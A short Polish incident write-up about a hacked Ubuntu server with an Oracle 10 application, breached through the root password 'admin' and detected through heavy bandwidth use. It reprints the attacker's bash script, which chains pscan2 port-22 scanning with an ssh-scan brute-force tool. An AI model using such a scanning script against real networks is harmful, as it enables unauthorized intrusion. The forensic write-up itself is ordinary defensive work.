Kilka dni temu zgłosiła się do nas firma która miała problem z jednym z serwerów. Serwer z systemem ubuntu oraz aplikacją działającą z bazą danych Oracle w wersji 10. Serwer powodował bardzo dużą utylizację łącza, mimo  tego iż nie powinien generować praktycznie żadnego ruchu.

 Po kilku godzinach analizy jasnym był fakt włamania. 

Teraz pozostało dowiedzieć się w jaki sposób agresor dostał się do systemu oraz co zmienił.

Pierwszy etap nie był zbyt trudny, osoba instalująca system podała nam hasło root: admin. Hasło nie wymaga chyba komentarza.

Drugi etap to wyszukanie zmian w systemie oraz ocena możliwości bezpiecznej pracy bez reinstalacji.

Do wyszukiwania zmian użyliśmy narzędzi typu rootkit hunter, tripwire itp. 

Agresor zainstalował prosty programik który "atakował" dalej:

#!/bin/bash
if [ $# != 1 ]; then
        echo " Folosesc: $0 clasa"
        exit;
fi

echo "<@Clasic> Its back ;-)"
./pscan2 $1 22

sleep 10
cat $1.pscan.22 |sort |uniq > mfu.txt
oopsnr2=`grep -c . mfu.txt`
echo "<@Clasic> Am gasit $oopsnr2 servere"
echo "------------------------"
echo "-=-      Clasic      -=-"
./ssh-scan 100
rm -rf $1.pscan.22 mfu.txt
echo "<@Clasic> Ia Zi Place Nu?!? PaiCum Pula MEa ;-)"

To wykryliśmy bardzo szybko, utylizacja łącza spadła.

Ale czy system był bezpieczny ? Okazało się że nie, analiza plików systemowych wykazała bardzo dużą ilość zmian. Uznaliśmy ze system jest zbyt mocno zainfekowany aby móc go oddać klientowi ze 100% gwarancją.  Zarekomendowaliśmy reinstalację systemu.